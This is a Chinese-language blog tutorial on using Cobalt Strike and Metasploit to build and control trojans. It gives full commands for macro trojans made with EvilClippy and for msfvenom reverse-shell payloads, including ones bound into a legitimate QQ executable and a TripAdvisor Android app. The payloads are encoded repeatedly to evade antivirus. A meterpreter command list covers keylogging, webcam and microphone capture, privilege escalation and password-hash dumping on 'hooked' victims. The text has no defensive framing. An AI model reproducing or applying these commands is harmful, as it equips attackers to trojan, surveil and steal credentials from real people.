Cobaltstrike与msf

一时失言乱红尘 2022-12-04 08:34 159阅读 0赞

# 一,常见错误 #

## CS ##

1.)使用方法  
①在cs安装目录中,执行(注意管理员权限下)

.\Keytool.exe -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"

.\teamserver.bat ip 1234
    #8.8.8.8为你的服务器外网IP,123456为Coabltstrike的客户端密码

②然后启动cs界面输入密码连接即可  
![在这里插入图片描述][20210111121345133.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]  
配置监听  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]

2.)配合EvilClippy形成宏木马类  
[生成宏文件][Link 1]  
[EvilClippy创建][EvilClippy]  
[vba创建][vba]

#生成宏木马
    EvilClippy.exe -s 2.vba 233.docm

## msf ##

易错bug+常见命令类操作  
[①解决更新后报错的方法][Link 2]

②进行监听的方法

msfconsole#启动监听程序
    #在msf中进行监听
    use exploit/multi/handler
    #选择启动监听的模块
    set payload windows/meterpreter/reverse_https
    #选择监听的端口
    set lport 3334
    #选择监听的ip
    set lhost ip
    启动上线
     exploit

# 二,生成木马且进行控制 #

## 1.msfvemon生成木马 ##

列出漏洞模块命令–>show payloads  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center]

指定生成类状况参数  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1]

> > \-p payloads  
> > \-f 输出格式  
> > \-o 输入地址  
> > \-e 编码方式（msfvenom -l -encoder 可以查看能使用的编码）  
> > \-x | -k 绑定程序 （例如 –x C:\\nomal.exe –k –f exe –o C:\\shell.exe）

如1.生成基础的木马与连接

msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.18.130  -f exe -o 123.exe
    #-o的含义是生成木马的保存的路径
    msfvenom -p windows/meterpreter/reverse_tcp   x86/single_static_bit -i  LHOST=192.168.18.130	LPORT=4444  -f c

![在这里插入图片描述][2020092910523064.png_pic_center]–>注意一般msfvemon生成的马典型利用该方法进行连接

①use exploit/multi/handler
    ②set payload windows/meterpreter/reverse_tcp
    ③set lhost  ip
    ④set lport  端口
    ⑤exploit #进行执行即可

注意点  
有点时候会连接不上–>原因:典型导致的是程序没有运行导致的  
2.绑定程序制作木马  
①查看编码类型

msfvenom -l encoders

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2]  
②捆绑木马  
如选择x86/shikata\_ga\_nai进行编码

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe
    #-i 5的含义是进行5次编码
    #-x 即选择捆绑软件的地址
    #-e 设置编码的类型格式

③连接方式类与上面同  
注意点：  
1.捆绑需要软件存在注入点才可以进行捆绑  
3.捆绑手机app  
如

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.6 LPORT=4444 -x tripadvisor.apk -k -o ta-rat.apk

2.组合使用类

#生成相关的文件
    $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -f elf -o /root/payload.elf
    #选择上面且进行捆绑木马-->-o即输出保存的路径
    #-x选项：允许我们指定一个自定义的可执行文件作为模板，也就是将木马捆绑到这个可执行文件上。
    $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -f elf -x /root/payload.elf -o /root/payload_backdoor.elf
    #实现免杀
    $ msfvenom -l encoders#查看编码的类型
    #选择编码器进行编码
    $ cd /usr/share
    $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -e x86/shikata_ga_nai -i 5 -f elf -o /root/payload_encoder.elf

# 2.msfconsole进行监听与进行远控 #

①查看上钩用户  
sessions（查看上钩的用户类）  
![在这里插入图片描述][20200924133916398.png_pic_center]

②指定用户进行攻击

1.  sessions -i 1（选择需要攻击的用户，这里选择第 1 个）
2.  shell （执行shell）  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3]

## 远控命令 ##

> > 进入meterpreter之后即可进行一些相关木马操作  
> > 常见的命令

--------------------

> > 用户操作  
> > Stdapi: User interface Commands（用户接口命令）  
> > enumdesktops -->列出所有可访问的桌面和窗口站（窗体列表）  
> > getdesktop -->得到当前的Meterpreter桌面  
> > idletime -->返回秒远程用户已经闲置数量  
> > 键盘记录类命令  
> > keyscan\_start -->开始捕获击键（开始键盘记录）  
> > keyscan\_dump -->转储按键缓冲（下载键盘记录）  
> > keyscan\_stop -->停止捕获击键（停止键盘记录）  
> > PS：键盘记录注意点，先开始，后下载，再结束，否则会出错  
> > 屏幕类命令  
> > screenshot -->抓取交互式桌面截图（当前操作界面截图一张）  
> > setdesktop -->改变meterpreters当前桌面  
> > uictl -->控制一些用户界面组件（获取键盘、鼠标控制权）  
> > 使用uictl -h 查看帮助（打开/关闭，键盘/鼠标）  
> > 摄像头类命令  
> > 摄像头：Stdapi: Webcam Commands（摄像头命令）  
> > record\_mic -->X秒从默认的麦克风record\_mic音频记录（音频录制）  
> > webcam\_chat -->开始视频聊天（视频，对方会有弹窗）  
> > webcam\_list -->单摄像头（查看摄像头列表）  
> > webcam\_snap -->采取快照从指定的摄像头（摄像头拍摄一张照片）  
> > webcam\_stream -->播放视频流从指定的摄像头（开启摄像头监控）  
> > 其他命令操作  
> > getsystem -->获取高权限  
> > hashdump -->获取当前用户hash

如  
①sysinfo命令  
![在这里插入图片描述][20200929173721852.png_pic_center]  
②获取shell

shell

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 4]  
进行windows下的命令进行控制即可

[msf安全测试渗透总结][msf]

[20210111121345133.png]: /images/20221123/6f56820d14c7435ba3b1a1d0ee98f0cb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]: /images/20221123/7be566e8678d405ea85c126f9ea76002.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]: /images/20221123/5b44d079d82b4e4cb049efbbae6fdfe3.png
[Link 1]: https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247492416&idx=1&sn=c444b28f7aa67e9ee15d42bc1aeef10d&chksm=ec1cb67fdb6b3f69d33753fd68cad86f401c07f5fddb3157c81468cab144978a5fb3840da037&mpshare=1&scene=1&srcid=1209KgX4tzyoc340mkTY1d2q&sharer_sharetime=1607781186558&sharer_shareid=3ddecef91970193e8ea3bb518673e755&key=8754383d345c9bd68e56a7d2db9b9af7822c11aa9bfa2a8c75bbe7ce26f96288d70069cdb633a42dc8b3c23e3880c7145f9839e056c4ba4ba718a4ed7e6e8113a6534d2a7ac547e9d2154453496d38e996155ecb07173a981abd5442c54c747f2d280d4d942621443f5b39639a8ff795ae5e57e919c9d5a48a5269198dc502a2&ascene=1&uin=MzczMjg5MzgxMQ==&devicetype=Windows%2010%20x64&version=62090529&lang=zh_CN&exportkey=A6oy5MFIsNGOgUXVjGRfU6s=&pass_ticket=byMeJSNteEWVHI1X1au1tSHzbIFaeJs3xPmudojtDH/AzD2U//hy%2bR4n4TaanL78&wx_header=0
[EvilClippy]: http://521.li/post/664.html
[vba]: https://forum.90sec.com/t/topic/248
[Link 2]: https://jingyan.baidu.com/article/48a42057b337e6e8242504e6.html
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/85aafdf44db44adf878a9f1b34fd86ae.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/bb7b870b00d84a28a90157ce8536ae98.png
[2020092910523064.png_pic_center]: /images/20221123/25038bec06a940a0b5817e89e045ce5b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/9daae0f071a747a184ef84d2d2c0a0ba.png
[20200924133916398.png_pic_center]: /images/20221123/f51fdde3f5fd40f29d9b8d12c4586096.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/cd8a46a639d64fb8b7bb86112d7fcc6a.png
[20200929173721852.png_pic_center]: /images/20221123/ab6866cc185b4e3d8a754693ae01b856.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221123/0bfb49215986494cb94bce7c45fd9b36.png
[msf]: https://blog.csdn.net/An1090239782/article/details/108616301